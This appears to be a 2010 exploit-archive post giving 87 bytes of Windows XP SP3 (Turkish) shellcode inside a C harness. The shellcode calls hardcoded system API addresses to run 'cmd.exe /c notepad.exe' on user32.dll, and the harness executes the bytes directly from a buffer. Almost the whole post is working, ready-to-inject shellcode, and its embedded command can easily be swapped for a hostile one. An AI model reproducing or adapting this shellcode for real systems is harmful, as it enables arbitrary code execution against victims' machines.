# Title        : win32/xp sp3 (Tr) user32.dll Edit with notepad.exe Shellcode 87 bytes
# Proof        : http://img828.imageshack.us/img828/4554/editm.jpg
# Author       : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn     : admin@yildirimordulari.com
# Home         : http://z0rlu.blogspot.com
# Date         : 17/09/2010
# Tesekkur     : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi      : off ulan off  /  http://www.youtube.com/watch?v=GbyF62skA-c


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
int main(){
    
    unsigned char shellcode[]=
    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x6f\x74\x65\x70\x61"
    "\x64\x2e\x65\x78\x65\x20\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c"
    "\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x75\x73\x65\x72\x33\x32\x2e\x64"
    "\x6c\x6c";
 
    printf("Size = %d bytes\n", strlen(shellcode));
 
    ((void (*)())shellcode)();
 
    return 0;
}